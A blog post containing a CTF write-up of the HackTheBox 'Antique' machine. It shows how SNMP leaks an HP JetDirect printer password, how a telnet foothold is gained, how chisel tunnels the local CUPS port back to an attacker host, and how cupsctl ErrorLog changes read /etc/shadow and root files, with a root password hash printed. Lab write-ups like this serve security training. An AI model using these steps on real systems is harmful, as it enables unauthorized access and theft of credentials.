<!DOCTYPE html><html lang="en" data-mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="Antique writeup" /><meta property="og:locale" content="en" /><meta name="description" content="Summary This box is centered around exploiting a misconfigured HP JetDirect printer via snmp. It also covers port forwarding an exploiting the CUPS service, which is a modular printing service for Unix-like computer systems. Let’s take a look!" /><meta property="og:description" content="Summary This box is centered around exploiting a misconfigured HP JetDirect printer via snmp. It also covers port forwarding an exploiting the CUPS service, which is a modular printing service for Unix-like computer systems. Let’s take a look!" /><link rel="canonical" href="https://bitisg.github.io/posts/Antique/" /><meta property="og:url" content="https://bitisg.github.io/posts/Antique/" /><meta property="og:site_name" content="BitisGabonica" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2022-06-17T12:00:00+02:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Antique writeup" /><meta name="twitter:site" content="@BitisGabonica1" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2022-07-02T16:35:48+02:00","datePublished":"2022-06-17T12:00:00+02:00","description":"Summary This box is centered around exploiting a misconfigured HP JetDirect printer via snmp. It also covers port forwarding an exploiting the CUPS service, which is a modular printing service for Unix-like computer systems. Let’s take a look!","headline":"Antique writeup","mainEntityOfPage":{"@type":"WebPage","@id":"https://bitisg.github.io/posts/Antique/"},"url":"https://bitisg.github.io/posts/Antique/"}</script><title>Antique writeup | BitisGabonica</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="BitisGabonica"><meta name="application-name" content="BitisGabonica"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src=" /assets/img/sui.png " alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">BitisGabonica</a></div><div class="site-subtitle font-italic">CTF writeups and other stuff</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <a href="https://github.com/BitisG" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/BitisGabonica1" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['0xBitisGabonica','protonmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>Antique writeup</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 1000 400'%3E%3C/svg%3E" data-src="/assets/img/boxes/antique/Antique.png" class="preview-img bg" alt="Preview Image" width="1000" height="400" data-proofer-ignore><h1 data-toc-skip>Antique writeup</h1><div class="post-meta text-muted"><div> By <em> <a href="https://twitter.com/BitisGabonica1">BitisGabonica</a> </em></div><div class="d-flex"><div> <span> Posted <em class="timeago" data-ts="1655460000" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2022-06-17 </em> </span> <span> Updated <em class="timeago" data-ts="1656772548" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2022-07-02 </em> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="722 words"> <em>4 min</em> read</span></div></div></div><div class="post-content"><h2 id="summary"><span class="mr-2">Summary</span><a href="#summary" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>This box is centered around exploiting a misconfigured HP JetDirect printer via snmp. It also covers port forwarding an exploiting the <a href="https://en.wikipedia.org/wiki/CUPS">CUPS</a> service, which is a modular printing service for Unix-like computer systems. Let’s take a look!</p><h2 id="foothold"><span class="mr-2">Foothold</span><a href="#foothold" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>starting an nmap scan, we see a telnet service on port 23. It says something about HP jetdirect when trying to connect to it via telnet.</p><p>we also do a UDP scan on the address, with the -sU tag. This takes a while</p><p>The only port open and unfiltered besides telnet is 161/udp:</p><div class="language-console highlighter-rouge"><div class="code-header"> <span data-label-text="Console"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre><span class="gp">#</span><span class="w"> </span>Nmap 7.92 scan initiated Sat Jun 11 00:39:54 2022 as: nmap <span class="nt">-sU</span> <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-o</span> nmap/udp.txt 10.129.71.148
<span class="go">Nmap scan report for 10.129.71.148
Host is up (0.025s latency).
Not shown: 997 closed udp ports (port-unreach)
PORT      STATE         SERVICE VERSION
68/udp    open|filtered dhcpc
161/udp   open          snmp    SNMPv1 server (public)
40441/udp open|filtered unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
</span><span class="gp">#</span><span class="w"> </span>Nmap <span class="k">done </span>at Sat Jun 11 00:59:53 2022 <span class="nt">--</span> 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>1198.94 seconds
</pre></table></code></div></div><p>running <code class="language-plaintext highlighter-rouge">snmpwalk -v 1 -c public $IP</code> reveals its a printer named HTB Printer. Since the only available entrypoint seems to be this printer, we better find out how to exploit it. <a href="http://www.irongeek.com/i.php?page=security/networkprinterhacking">This</a> blogpost goes into a lot of detail on how exploit a HP jetdicrect printer which has not been configured correctly. Basically, if the right string is sent to the printer it will respond with its own password.</p><p>This can be exploited with the following command:</p><div class="language-console highlighter-rouge"><div class="code-header"> <span data-label-text="Console"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="go">snmpwalk -v 1 -c public .1.3.6.1.4.1.11.2.3.9.1.1.13.0
</span></pre></table></code></div></div><p>This returns some hexcodes. decoding this shows a password: P@ssw0rd@123!!123</p><p>Log in to the telnet service with this password</p><p>Once logged in to the telnet service, the <code class="language-plaintext highlighter-rouge">exec id</code> command can be used to find who we are connected as. We can see that we are the user lp, within the lpadmin group. To get a reverse shell, simply prepend exec to any reverse shell payload you want to use. Most should work.</p><p>userflag:f48580e6c8557d0426e3413517504121</p><h2 id="privilege-escalation"><span class="mr-2">Privilege escalation</span><a href="#privilege-escalation" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>we run <code class="language-plaintext highlighter-rouge">ss --tulnp</code> and get the following:</p><div class="language-console highlighter-rouge"><div class="code-header"> <span data-label-text="Console"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre><span class="gp">lp@antique:~$</span><span class="w"> </span>ss <span class="nt">-tulnp</span>
<span class="go">ss -tulnp
Netid   State    Recv-Q   Send-Q     Local Address:Port     Peer Address:Port   Process                                                                         
udp     UNCONN   0        0                0.0.0.0:68            0.0.0.0:*                                                                                      
udp     UNCONN   0        0                0.0.0.0:161           0.0.0.0:*                                                                                      
tcp     LISTEN   0        128              0.0.0.0:23            0.0.0.0:*       users:(("python3",pid=1150,fd=3))                                              
tcp     LISTEN   0        4096           127.0.0.1:631           0.0.0.0:*                                                                                      
tcp     LISTEN   0        4096               [::1]:631              [::]:*                                                                                      
</span><span class="gp">lp@antique:~$</span><span class="w"> 
</span></pre></table></code></div></div><p>the interesting part of this output is that the machine is listening on port 631 since this port did not show up on our scans. I will use chisel to set up a listening port on my machine which i can then use to communicate with port 631 on the target machine</p><p>on the attacker machine we run the following command: <code class="language-plaintext highlighter-rouge">./chisel server --reverse -p 8000</code></p><p>on the victim machine: <code class="language-plaintext highlighter-rouge">./chisel client 10.10.17.182:8000 R:8001:127.0.0.1:631</code></p><p>output of chisel server once connection has been esablished:</p><div class="language-console highlighter-rouge"><div class="code-header"> <span data-label-text="Console"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre><span class="go">./chisel server --reverse -p 8000
2022/06/11 01:27:02 server: Reverse tunnelling enabled
2022/06/11 01:27:02 server: Fingerprint gV7xDnh1btaUqoCrX8/mA9qgIZzsnrA2m1TEsRKLmO0=
2022/06/11 01:27:02 server: Listening on http://0.0.0.0:8000
</span><span class="gp">2022/06/11 01:30:19 server: session#</span>1: tun: proxy#R:8001<span class="o">=&gt;</span>631: Listening
</pre></table></code></div></div><p>when visiting localhost:8001 in our browser we get greeted with the following page <img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 972 589'%3E%3C/svg%3E" data-src="/assets/img/boxes/antique/port631.png" alt="Cups service landing page" width="972" height="589" data-proofer-ignore></p><p>searching for exploits in cups 1.6.1 leads us to the following link <a href="https://www.rapid7.com/db/modules/post/multi/escalate/cups_root_file_read/">https://www.rapid7.com/db/modules/post/multi/escalate/cups_root_file_read/</a></p><p>We can read files as root through the error log page on cups through the error log path.</p><p>To change the path we need to use cupsctl. See below</p><div class="language-console highlighter-rouge"><div class="code-header"> <span data-label-text="Console"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre><td class="rouge-code"><pre><span class="gp">p@antique:~$</span><span class="w"> </span>cupsctl <span class="s1">'ErrorLog'</span><span class="o">=</span>/etc/shadow
<span class="go">cupsctl 'ErrorLog'=/etc/shadow
</span><span class="gp">lp@antique:~$</span><span class="w"> </span>curl http://localhost:631/admin/log/error_log?
<span class="go">curl http://localhost:631/admin/log/error_log?
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   999  100   999    0     0   975k      0 --:--:-- --:--:-- --:--:--  975k
</span><span class="gp">root:$</span>6<span class="nv">$UgdyXjp3KC</span>.86MSD<span class="nv">$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs</span>.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::
<span class="go">daemon:*:18375:0:99999:7:::
---SNIP---
pollinate:*:18375:0:99999:7:::
systemd-coredump:!!:18389::::::
lxd:!:18389::::::
usbmux:*:18891:0:99999:7:::
</span></pre></table></code></div></div><p>We can of course crack the root hash and login as root, however we can also just change the error log path to /root/root.txt and read the root flag:</p><div class="language-console highlighter-rouge"><div class="code-header"> <span data-label-text="Console"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre><span class="gp">lp@antique:~$</span><span class="w"> </span>cupsctl <span class="s2">"ErrorLog"</span><span class="o">=</span>/root/root.txt
<span class="go">cupsctl "ErrorLog"=/root/root.txt
</span><span class="gp">lp@antique:~$</span><span class="w"> </span>curl http://localhost:631/admin/log/error_log?
<span class="go">curl http://localhost:631/admin/log/error_log?
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    33  100    33    0     0  33000      0 --:--:-- --:--:-- --:--:-- 33000
41a5b5db9f352acb5da454924de84bea
</span><span class="gp">lp@antique:~$</span><span class="w"> 
</span></pre></table></code></div></div></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/writeup/'>Writeup</a>, <a href='/categories/hackthebox/'>HackTheBox</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/easy-box/" class="post-tag no-text-decoration" >Easy-box</a> <a href="/tags/chisel/" class="post-tag no-text-decoration" >chisel</a> <a href="/tags/printer/" class="post-tag no-text-decoration" >printer</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Antique writeup - BitisGabonica&amp;url=https://bitisg.github.io/posts/Antique/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Antique writeup - BitisGabonica&amp;u=https://bitisg.github.io/posts/Antique/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https://bitisg.github.io/posts/Antique/&amp;text=Antique writeup - BitisGabonica" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/DroidComp/">DroidComp writeup</a><li><a href="/posts/Faculty/">Faculty writeup</a><li><a href="/posts/Trick/">Trick writeup</a><li><a href="/posts/Seal/">Seal writeup</a><li><a href="/posts/Devzat/">Devzat writeup</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/easy-box/">Easy-box</a> <a class="post-tag" href="/tags/medium-box/">medium-box</a> <a class="post-tag" href="/tags/metasploit/">metasploit</a> <a class="post-tag" href="/tags/android/">android</a> <a class="post-tag" href="/tags/windows/">windows</a> <a class="post-tag" href="/tags/apk/">apk</a> <a class="post-tag" href="/tags/api/">api</a> <a class="post-tag" href="/tags/forensics/">forensics</a> <a class="post-tag" href="/tags/git/">git</a> <a class="post-tag" href="/tags/jwt/">jwt</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/Driver/"><div class="card-body"> <em class="timeago small" data-ts="1655834400" > 2022-06-21 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Driver writeup</h3><div class="text-muted small"><p> Summary This quite an interesting easy box, or at least the foothold step is. It starts out with using an scf file to force the target system to connect to the attacker system when opened. The atta...</p></div></div></a></div><div class="card"> <a href="/posts/Opensource/"><div class="card-body"> <em class="timeago small" data-ts="1656165600" > 2022-06-25 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Opensource writeup</h3><div class="text-muted small"><p> Summary Foothold We start out by doing an nmap port scan: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 # Nmap 7.92 scan initiated Wed Jun 8 16:04:07 2022 as: nmap -sC -sV -o nmap/ini.tx...</p></div></div></a></div><div class="card"> <a href="/posts/Return/"><div class="card-body"> <em class="timeago small" data-ts="1656334800" > 2022-06-27 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Return writeup</h3><div class="text-muted small"><p> Summary This box is an easy windows machine that focuses on using a user that is part of the Server Operators group to start a service giving us a reverse shell as nt authority\system Foothold We ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <span class="btn btn-outline-primary disabled" prompt="Older"><p>-</p></span> <a href="/posts/Armageddon/" class="btn btn-outline-primary" prompt="Newer"><p>Armageddon writeup</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center text-muted"><div class="footer-left"><p class="mb-0"> © 2023 <a href="https://twitter.com/BitisGabonica1">BitisGabonica</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/easy-box/">Easy-box</a> <a class="post-tag" href="/tags/medium-box/">medium-box</a> <a class="post-tag" href="/tags/metasploit/">metasploit</a> <a class="post-tag" href="/tags/android/">android</a> <a class="post-tag" href="/tags/windows/">windows</a> <a class="post-tag" href="/tags/apk/">apk</a> <a class="post-tag" href="/tags/api/">api</a> <a class="post-tag" href="/tags/forensics/">forensics</a> <a class="post-tag" href="/tags/git/">git</a> <a class="post-tag" href="/tags/jwt/">jwt</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id=G-4RZWBJKYF3"></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-4RZWBJKYF3'); }); </script>
